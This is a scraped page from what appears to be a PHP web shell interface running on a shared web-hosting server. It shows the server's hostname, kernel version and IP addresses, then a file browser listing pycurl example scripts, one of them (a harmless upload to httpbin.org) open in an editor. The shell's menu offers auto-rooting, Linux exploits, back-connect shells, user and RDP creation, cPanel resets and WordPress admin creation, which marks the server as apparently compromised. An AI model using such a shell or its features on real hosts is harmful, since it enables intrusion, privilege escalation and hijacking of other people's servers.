Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.191.154.167
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
hc_python /
share /
doc /
pycurl /
examples /
quickstart /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
file_upload_buffer.py
311
B
-rw-r--r--
file_upload_real.py
291
B
-rw-r--r--
file_upload_real_fancy.py
483
B
-rw-r--r--
follow_redirect.py
250
B
-rw-r--r--
form_post.py
564
B
-rw-r--r--
get.py
583
B
-rw-r--r--
get_python2.py
447
B
-rw-r--r--
get_python2_https.py
498
B
-rw-r--r--
get_python3.py
403
B
-rw-r--r--
get_python3_https.py
454
B
-rw-r--r--
put_buffer.py
472
B
-rw-r--r--
put_file.py
300
B
-rw-r--r--
response_headers.py
2.05
KB
-rw-r--r--
response_info.py
498
B
-rw-r--r--
write_file.py
357
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : file_upload_buffer.py
#! /usr/bin/env python # -*- coding: utf-8 -*- # vi:ts=4:et import pycurl c = pycurl.Curl() c.setopt(c.URL, 'https://httpbin.org/post') c.setopt(c.HTTPPOST, [ ('fileupload', ( c.FORM_BUFFER, 'readme.txt', c.FORM_BUFFERPTR, 'This is a fancy readme file', )), ]) c.perform() c.close()
Close